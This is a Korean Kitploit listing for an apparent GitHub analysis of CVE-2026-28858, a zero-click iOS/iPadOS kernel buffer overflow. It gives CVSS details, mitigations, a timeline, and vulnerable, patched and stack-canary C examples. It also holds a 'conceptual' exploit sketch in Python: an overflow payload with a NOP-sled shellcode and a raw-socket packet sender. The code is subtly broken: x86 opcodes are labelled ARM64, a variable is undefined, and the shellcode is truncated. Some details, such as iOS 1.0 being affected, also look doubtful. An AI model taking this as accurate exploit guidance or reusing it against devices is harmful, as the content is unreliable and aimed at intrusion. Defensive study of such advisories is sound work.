Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-28858 — CVE-2026-28858에 대한 기술 분석: Apple iOS/iPadOS 커널의 치명적인 버퍼 오버플로우로, 익스플로잇 흐름, 완화 조치, 방어적 코딩 예제를 포함합니다. | Kitploit
도구/GitHubGitHub/kaleth4/cve-2026-28858
iOS SecurityVulnerability AnalysisExploitationMobile SecurityLearning & EducationBinary Exploitation
GitHubkaleth4/cve-2026-28858

CVE-2026-28858

CVE-2026-28858에 대한 기술 분석: Apple iOS/iPadOS 커널의 치명적인 버퍼 오버플로우로, 익스플로잇 흐름, 완화 조치, 방어적 코딩 예제를 포함합니다.

저장소 보기
246개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ CVE-2026-28858 — Apple iOS/iPadOS 버퍼 오버플로우

╔══════════════════════════════════════════════════════════════╗
║  심각도: 치명적  │  CVSS: 9.8  │  CWE-120  │  원격   ║
╚══════════════════════════════════════════════════════════════╝

원격 사용자는 사용자 상호작용이나 권한 없이 iOS/iPadOS에서 시스템의 예기치 않은 종료 또는 커널 메모리 손상을 유발할 수 있습니다.


📋 기술 정보

필드값
CVE IDCVE-2026-28858
EUVDEUVD-2026-15131
게시일2026년 3월 25일
최종 업데이트2026년 3월 26일
CVSS v3.19.8 / 10 — 치명적
EPSS0.05%
벡터CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-120 — 크기 확인 없는 버퍼 복사
상태분석 완료 — 패치 사용 가능

🎯 설명

Apple iOS 및 iPadOS의 커널 입력 처리 시 경계 검사가 불충분하여 발생하는 버퍼 오버플로우(Buffer Overflow)입니다.

실제 영향:

  • 서비스 거부(시스템 충돌)
  • 커널 메모리 손상
  • 커널 권한으로 임의 코드 실행 가능성
  • 제로클릭: 사용자 상호작용 불필요

⚡ 공격 벡터 세부 정보

매개변수값설명
공격 벡터네트워크원격으로 악용 가능
복잡성낮음특별한 조건 없음
필요한 권한없음인증 불필요
사용자 상호작용없음제로클릭
범위변경 없음취약한 구성 요소에 국한
기밀성높음데이터 전체 접근
무결성높음전체 수정 가능
가용성높음시스템 충돌

🔬 기술 분석 및 코드 예시

CVE-2026-28858에 대한 공개 익스플로잇은 존재하지 않습니다. 다음 표현은 CWE-120 및 문서화된 공격 벡터를 기반으로 한 개념적 표현입니다.

1. 페이로드 구조 (오버플로우)

# 오버플로우의 개념적 표현
import socket

# 1. 할당된 버퍼 채우기 (커널 핸들러에서 일반적으로 ~512바이트)
buffer_fill = b"A" * 512

# 2. 덮어쓴 반환 주소 — 공격자가 제어하는 영역을 가리킴
# 실제 iOS/iPadOS: ASLR + PAC(Pointer Authentication Codes) 우회 필요
return_address = b"\x41\x42\x43\x44"

# 3. 셸코드: NOP 슬레드 + ARM64용 악성 명령어
shellcode = b"\x90" * 16 + b"\xeb\x12..."  # NOP 슬레드 + 페이로드

payload = buffer_fill + return_address + shellcode

2. 전달 벡터 (제로클릭)

# 사용자 상호작용 없는 원격 전달
# 예: 조작된 길이 필드가 있는 네트워크 패킷

import struct

def craft_malicious_packet(target_ip: str, target_port: int):
    """
    iOS 커널이 백그라운드에서 처리하는(사용자 UI 없이)
    잘못된 형식의 메타데이터가 포함된 패킷을 생성합니다.
    예: TLS 인증서, 이미지 메타데이터, 네트워크 프로토콜 필드.
    """
    # 프로토콜의 정상 헤더
    header = struct.pack(">HH", 0x0001, 0xFFFF)  # type=1, length=OVERFLOW

    # 커널 버퍼를 초과하는 페이로드
    malicious_data = header + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
        s.sendto(malicious_data, (target_ip, target_port))

3. 커널에서의 실행 (익스플로잇 흐름)

[네트워크/WiFi/BT] → 잘못된 형식의 패킷
      ↓
[백그라운드 iOS 프로세스] → "길이" 필드 읽기 = 0xFFFF
      ↓
[memcpy(커널_버퍼, 데이터, 0xFFFF)] → 경계 검사 없음
      ↓
[오버플로우: 셸코드가 커널 스택/힙에 기록됨]
      ↓
[프로세서가 공격자의 return_address로 리디렉션됨]
      ↓
[ring 0 / 커널 권한으로 실행]

4. 취약한 코드 vs. 수정된 코드

/* ❌ 취약한 코드 (패치 이전) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];
    memcpy(bufer_kernel, datos_usuario, longitud); // 검증 없음
}

/* ✅ 수정된 코드 (iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];

    // 경계 검사 — Apple이 적용한 수정
    if (longitud > sizeof(bufer_kernel)) {
        kernel_log("CVE-2026-28858: 입력 잘림 [%zu > 512]", longitud);
        return; // 복사 전에 중단
    }

    memcpy(bufer_kernel, datos_usuario, longitud);
}

5. 스택 카나리로 탐지

/* 심층 방어 메커니즘: 스택 카나리 */
#include <string.h>

#define CANARY_VALUE 0xDEADBEEFCAFEBABE

void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
    uint64_t canary = CANARY_VALUE;
    char bufer_seguro[512];

    if (longitud > sizeof(bufer_seguro)) {
        log_security_event("오버플로우 시도 차단됨");
        return;
    }

    memcpy(bufer_seguro, datos_usuario, longitud);

    // 복사 후 카나리 무결성 확인
    if (canary != CANARY_VALUE) {
        panic("스택 스매싱 감지 — CVE-2026-28858");
    }
}

🛡️ 완화 조치

즉시 필요한 조치:

iOS 26.4 / iPadOS 26.4 이상으로 업데이트
  • 설정 → 일반 → 소프트웨어 업데이트
  • 26.4 이전 버전의 모든 Apple 기기에 적용
  • 실행 가능한 해결 방법 없음 — 패치만이 효과적

📅 타임라인

2026년 3월 23일  → 최초 게시 (EUVD)
2026년 3월 24일  → Apple 권고 #126792 게시
2026년 3월 24일  → 최초 언급 감지 (Feedly)
2026년 3월 24일  → 자동 분석을 통한 CVSS 추정
2026년 3월 25일  → NVD가 CVSS 9.8 — 치명적 지정
2026년 3월 25일  → Qualys 탐지 추가 (ID: 610773)
2026년 3월 26일  → 상태: 분석 완료

🖥️ 영향을 받는 시스템

26.4 이전의 모든 iOS 및 iPadOS 버전, 다음을 포함:

  • iOS 1.0 → 26.3.x
  • iPadOS 12.1 → 26.3.x

영향을 받는 전체 CPE 목록은 참조 문서를 확인하세요.


🔗 참조

출처URL
Apple 보안 권고https://support.apple.com/en-us/126792
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-28858
CWE-120https://cwe.mitre.org/data/definitions/120.html

⚠️ 관련 CAPEC 분류

  • CAPEC-100 — 버퍼 오버플로우
  • CAPEC-10 — 환경 변수를 통한 오버플로우
  • CAPEC-14 — 클라이언트 측 주입으로 유발된 버퍼 오버플로우
  • CAPEC-8 — API 호출의 버퍼 오버플로우
  • CAPEC-92 — 강제 정수 오버플로우

면책 조항: 제시된 코드는 교육 및 방어적 연구 목적의 개념적 표현일 뿐입니다. CVE-2026-28858에 대한 공개 익스플로잇은 존재하지 않습니다.

도구 다운로드